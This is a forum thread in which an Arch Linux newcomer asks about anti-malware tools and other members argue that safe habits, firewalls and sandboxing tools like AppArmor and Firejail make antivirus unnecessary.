Arch Linux and anti malware?

Discussion in 'all things UNIX' started by zakazak, Aug 4, 2015.

  1. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Hey there,

    I am about to make a semi-switch from Windows to Arch Linux (dual boot for now) and wonder what kind of anti-malware / anti-exploit / anti-virus solutions and products are available on linux ?

    Don't tell me linux is malware free and doesn't need that kind of stuff, it is a waste of lies :p

    So far I thought about sophos as av. But in general it seems like the av technology is miles behind the solutions/products that are available on windows ?

    Thanks
     
  2. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    OMG. Not another one of these threads.

    You don't need an Antivirus or antimalware or anti-exploit or anti-this and anti-that. It's as simple as that. A good Firewall setup is enough, considering you keep up with security updates; which in Arch's case, you need to regularly update your system.

    In Linux you don't need to rely on a company with a mere 200 employees to find bugs so they can patch them, you're constantly getting security updates, hundreds of thousands of people are trying to exploit it and since the source code is open there are more bugs discovered. On Windows you get updates usually once a month; in Linux it can be dozens a day. Just today I received an e-Mail from the Debian Security Team about how they've found and already patched a bug in wordpress, and this can go on 7 or 8 times a day.

    Just remember the basic Linux rules and you'll be fine:
    • Use trusted repositories;
    • Keep your system up-to-date;
    • Set up a Firewall;
    • Don't use your root account, and if possible don't put your account into 'sudo' or 'wheel' group;
    • If you install something from the AUR, read the PKGBUILD first;
    • Don't open "FamousSingerNaked.deb";
    • Secure your browser (Firefox: NoScript + Disconnect + RequestPolicy);
    You don't need an antivirus on Linux. Period. They mostly detect WINDOWS malware. Oh, don't tell me that this is because that youtuber who said he got a malware on Arch? That guy clearly doesn't know what he talks about. Seriously, I don't want to bash on the guy, but once he throws that verbal diarrea and nonesense into a public place and disable comments, someone has to talk about his attitude: http://www.linux.org/threads/matthew-moore-gets-a-virus-on-arch.8011/ Just read that thread and you'll know what I'm talking about. Read it in it's entirety, please. And read this one too https://www.reddit.com/r/linux/comments/33s60i/mythbusting_linux_guy_says_he_proofs_that_his/

    He proved nothing. NOTHING. All his points were distorted from reality and from what the reffered website said. He didn't get a malware, for instance (read the threads I posted, it's too long for me to post here).

    What I do recommend is "rkhunter", a package to detect a whole lot of useful information.

    Also, why jumping from Windows do Arch? You should start with something easier like Debian.
     
  3. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    I am not talking about any youtuber or article or what ever. I am seeing the malware, pw stealers, exploit kits and trojans that you can buy for 15$ on many forums/websites to infect linux machines. They are even some that run on windows AND linux.

    So yes, anti malware is definitely needed.

    A firewall might block the internet connection but won't remove the malware or prevent it from executing in the first place.
     
  4. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    No, it's not. You need to literaly exploit the system, and that means basically having open ports listening on the internet. On Windows you have many of those by default, and most are easily exploitable. On Arch no internet port is open because it doesn't have such services. And even it there were open ports you need to find vulnerabilities in them, and even IF you managed to do that (that's a HUGE *if*) you'd be locked out on the user's /home folder and wouldn't have access to the system at all. So no, you don't need any of that crap. The malware can't get in, so you don't need to remove it.

    And lets say it did get in because you screwed your system: no file is marked as executable by default, you LITERALY have to open it's properties and mark "I WANT THIS FILE TO HAVE EXECUTABLE PERMISSIONS". And let's say you did that and managed to install a malware on your own, you'd be using a non-priviledged account which has only access to it's own folders, you simply log out and then log in as root (via tty1) and remove the executable code from the user's /home folder. Done. And if you ran the program as root? Well, that is your fault. Not Linux's.
    And none of that would have happened if you didn't run the unknown program as root and used only trusted repositories. It all falls apart once YOU do something wrong.

    And if you still think you need these nonesense products, I invite anyone to exploit my Arch box, it doesn't have sophos, or ClamAV, or Kaspersky, or COMODO, or Bitdefender, or SELinux or Apparmor..... Go ahead, my IP is (edited because I changed it) and the admins of this site know that (sub-router IP edited by amarildojr). Please, invade my Linux and tell what are the contents of the file "MALWARE" in my Desktop. I can even click on malicios links that would try to exploit my Firefox browser, so if you have one please send it over PM for me.
     
    Last edited: Aug 4, 2015
  5. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Sorry I dont want to discuss how secure you feel about your system. There are too many widespread opinions and experiences about this topic and I don't want to cause any troubles with you as well :)

    I would rather know how you made your system secure. I would also be willing to send you some links to where you can buy/get malware for linux. Maybe they will give you test samples. All I want to say is that malware for linux is out there. It is and can be undedectable, can be bound with other files and can also be spread via exploits. If that malware wouldn't be any good then the developers wouldn't be able to sell it and wouldn't keep those projects alive.

    But for now I am mostly interested in what kind of anti malware solutions are out there and if any of them are actually good.
     
  6. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    You're still spinning the same wheel =/

    I didn't make my Arch more secure than it already is. The only thing I do is have a custom Firewall setup, look at my signature.

    I wouldn't want that. Not only because it's anti-ethical, but because Linux malware need to be "setup" whith physical access to the machine in the vast majority of cases, and it wouldn't spread like it does on Windows. It's pointless to infect a single Linux machine, and it's waaay harder to do so than it is on Windows.

    But you're the one so secure that it is easy to be infected on Linux, so much that you even created this thread and is telling that it easy to be infected. All I'm doing is making it easier for you to prove your point ;)

    Sure there are. They just don't spread, and you won't need Sophos or any other BS security product. I just demonstrated on my other post how you can be safe without them, and how the user screws his/her system because of ignorance.

    And you think some Windowsy security company is going to protect you in such case? Like I said, just follow the simple Linux rules and you'll be fine. You're the problem on security, and those products aren't the solution. Rather, they only drag knowledge away from you, and that's how they profit on Linux: a good portion of profit comes from users who don't know jack about Linux security, from users who just "feel safer" because they have a product that will detect 99.9999% of WINDOWS malware, etc.

    Even if you run viruses ON WINE you won't get results on 99.99% of the times. That's right, there has been some study showing how malware aren't as nearly as effective on Wine, the program that makes running most Windows software on Linux possible.
    So why bother having an AV? That's pointless.

    Not on trustable repositories. Again, it doesn't matter how secure the system is, if you run "FamousSingerNaked.deb" then YOU are the problem, not the system, and there is probably nothing one can do to protect user ignorance. Just stick to the distro's repositories, they do a good job on securing packages.

    You seem to know what you're talking about, so I'm going to politely ask for proof of that happening right now.
     
    Last edited: Aug 4, 2015
  7. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    I am not saying that windows is more secure. The secure products that are available for windows are more advanced than on linux. That is for sure. So yes malware can also be undedected on windows (this is what you mainly pay for when buying malware..that it is still undedected and not reported to any of the av companies out there). But that is where behaviour blockers, hips and fw come into the game.

    I am not sure how trustable repos work but you can bind malware to other files while faking e.g. the md5 hash (bind malware but keep the same orig md5 hash). So maybe there is a way but I really have no idea about that.

    Give me 200$-300$ so I can buy myself access to some of the "known" exploit kits and set up a website for you :) No really, I am not going to proof anything. I have seen enough malware and ways to infect someone and I have seen even more ppl who claimed to be virus free for years while half their keys/password where already spread through the www.

    I agree that FW is the most important thing (to block outgoing and incoming connections that try to either send away your data and access you from outside). And with typical usage (and maybe usage of e.g. NortonDNS with malware blocklist) you SHOULD do just fine. But the possibilty is there. And it is bigger than most would realize. And example are Mac OSX user who claim to be malware free until like every 1-2 years a new malware finally gets deddcted which has already infected a mass of people and sat on their systsm undedected for ages... Since 2006 I belive.
     
  8. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    Oooohhh, PLEASE do bind malware on known and verified repositories!! hahahaha, boy would I love to see that. I'm sure you can do that, right? I mean, you talk so much about it :D Yet you haven't proved any of your arguments so far hehehehe.
    Oh, now I see. You don't know what you're talking about :)

    Why would I do that? The burden of proof is on the hands of the person who makes a claim. I didn't claim I need security products on Linux and I didn't claim it is easy to do A or B or C. You are the one doing that, you're the one who should prove your claims. Not me.

    Then why make ridiculous claims?

    Yet all of those are either people who use Windows or people who don't follow the basic Linux guideline. Like I said, not even OpenBSD is going to protect a user who doesn't know how NOT to be the security problem.

    Sure. Not that one needs Norton on Linux, if they even make such product.

    You keep making claims that you can't prove.

    But Mac's are known to be insecure and they actually need security products. Linux doesn't, specially considering Arch/Gentoo users :) In fact, I'm starting to wonder if Arch is right for you, or Linux at all.
     
    Last edited: Aug 4, 2015
  9. Kerodo

    Kerodo Registered Member

    Joined:
    Oct 5, 2004
    Posts:
    7,786
    Seems to be just another case of a user bringing their Windows mindset to Linux. I've seen it many times, and it's just not appropriate... Live and learn, right... ;)
     
  10. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Yes NortonDNS exists for linux.. Like for every other OS where you can set a dns server.

    I see that you either dont understand what I am writing or you simply dont want to understand it. I believe it is the second one. So talking any further with you is pointless :/

    If anyone has recommendations for anti-malware apps on linux please let me know.

    P.s. "ehehehhhehehhee" :D
     
  11. summerheat

    summerheat Registered Member

    Joined:
    May 16, 2015
    Posts:
    729
    I'm afraid it's you who doesn't understand, certainly not amarildojr. As kerodo rightly said: You're bringing your Windows mindset to Linux. You don't know how Linux works but you still claim that it's insecure without "anti-malware apps".
     
  12. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Yes, looking at how much malware is available for linux and their infection/success rate as well as how easy it is to get your hands on it, tells me that linux needs security and hardening just as windows would need.

    But I agree that my knowledge of linux isnt as much as I want it to be.

    I dont know how the myth is still alive that linux cant get infected. There is so much data and so many malware vendors for linux out there that proof it :S
     
  13. summerheat

    summerheat Registered Member

    Joined:
    May 16, 2015
    Posts:
    729
    Nobody says that Linux can't get infected. If you download something from a malicious website and execute it as root you can seriously damage your system. But why would you do that? In the official repositories you'll find trustworthy opensource applications for nearly every purpose (in most cases several alternatives).

    And yes, there is malware for Linux. But again, as along as you use packages from your distro's repositiories that doesn't affect you at all. At risk are Linux servers: In most cases because they are carelessly configured (e.g. weak passwords) or they haven't been updated in ages ("don't change a running system").

    But Linux desktop systems are not at risk (unless you're doing something really stupid - see above). That said, I'm using AppArmor and protect several appliacations with Firejail. But not because I think that Linux desktop users are in danger. Rather, it's more of a feasibility study in order to see how a system can be made as secure as possible without making it unusable.
     
  14. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,516
    Use VirusTotal on stuff you download and install outside of trusted repositories. Simple as that. Oh and might as well install something like uBlock.

    I could say the same for Windows actually, just that the chance of being infected changes from 0.01% to 0.1%...

    And lastly, backup, backup, backup. Just don't open holes in the firewall.
     
  15. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    6,030
    Start with Debian stable (now jessie). The repositories are signed. Don't run any servers. If you must run SSH server for remote login, configure it (/etc/ssh/sshd_config) to disable login by root, and password-based login (so only key-based login is possible). Install iptables-persistent. Edit /etc/iptables/rules.v6 to drop everything. Edit /etc/iptables/rules.v4 to drop all incoming traffic by default, and then allow only established incoming, and loopback. There are many guides online with other tweaks to drop malformed packets faster.
     
  16. UnknownK

    UnknownK Registered Member

    Joined:
    Nov 3, 2012
    Posts:
    160
    Location:
    Unknown
    I can only give you some options which are available on arch linux for better security. You need to do some reading and choose if these fit your needs. Note that there are no anti-virus or anti-this/that tools available in linux. Even if there is any, nobody is going to recommend those to you.

    AppArmor
    (optional)

    Firejail (optional) ( do not download binaries from AUR, make packages using PKGBUILD after you personally verify them and then install them)

    Grsecurity
    (optional)

    Uncomplicated Firewall

    NoScript

    ublock/ublockOrigin

    Do not install non-free binaries like flash ( My recommendation )

    I don't think it will be easy for you to even install Arch linux coming straight from Windows. You can try Manjaro to get a taste of Arch , and then when you become somewhat familliar with basics you can install Arch linux. If you are open to other distributions, better still install Debian Stable.
     
  17. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    Like mine in my signature :p
     
  18. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    6,030
    Doh ;)

    Looks good :thumb:
     
  19. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    1,985
    Location:
    Canada
    @zakazak,

    you could open a terminal and type:
    yaourt antivirus (after installing yaourt)...


    ...which will give you several antivirus solutions to choose from if that's what you really want. My humble opinion is like the others, however, in that I seriously doubt you need one. You could run tremendously secure using chromium with a good script blocking extension like uBlock or uMatrix and perhaps throw in https everywhere as well. Even bolster it further by running it under Firejail and you can surf practically bullet proof.

    As an aside, a few handy commands I had to run to get more out of my Arch installation:

    $ sudo pacman -S base-devel

    $ sudo pacman -S fakeroot

    $ sudo pacman -Sy yaourt
     
  20. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Thanks for that, now that you mentioned it: I think firefox is the smart choice when it comes to privacy and security. I recently read that chromium still has "unwanted network acitivity" running in the backround?
     
  21. UnknownK

    UnknownK Registered Member

    Joined:
    Nov 3, 2012
    Posts:
    160
    Location:
    Unknown
    Can you elaborate more on this; why this is not secure and what is the best practice.
     
  22. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    The purpose of this non-administrative account is to, well, not have administrative priviledges. If this account is compromised and the attacker gets hold of the user's password, he/she could easily "sudo" his/her way around the system. If the users isn't on "sudo" or "wheel" group the attack surface will only be the user's /home folder. This is the default practice on Debian, for instance, and what I've been doing since my last Arch install. Whenever I need root priviledges I just "su -" and do whatever I need to do. Then after, just "exit" out of it.
     
    Last edited: Aug 5, 2015
  23. UnknownK

    UnknownK Registered Member

    Joined:
    Nov 3, 2012
    Posts:
    160
    Location:
    Unknown
    I just don't see how having a root account to do administrative tasks is more secure than having sudo. How is someone going to get hold of user's password? Using a keylogger? Then what's stopping him from getting the root's password? Username is root, it just has to log the phrase afer "su -" . In case of sudo there are certain other advantages like it times out after some time interval, in su you have to log out manually. In sudo, it is also possible to have an audit trail of the successful/unsuccesful access attempts. You can later find out who did what with sudo, not possible with su I think.

    Not really, becuase if you leave the root password blank, Debian will disable the root account and will automatically install sudo and add the user to group sudo.
     
    Last edited: Aug 5, 2015
  24. summerheat

    summerheat Registered Member

    Joined:
    May 16, 2015
    Posts:
    729
    I agree. BTW, using sudo instead of su is also what the Arch Linux wiki recommends.
     
  25. Trespasser

    Trespasser Registered Member

    Joined:
    Mar 1, 2005
    Posts:
    1,194
    Location:
    Virginia - Appalachian Mtns
    Hi Kerodo,
    Yeah, I had the same mindset when I first switched to Linux some 10 years ago. And like the original poster, one of the first things I started seeking was an anti-malware application...thinking it was only logical that I needed one.

    Still bring a chuckle to me when I read these types of posts, though.

    Bob
     
Loading...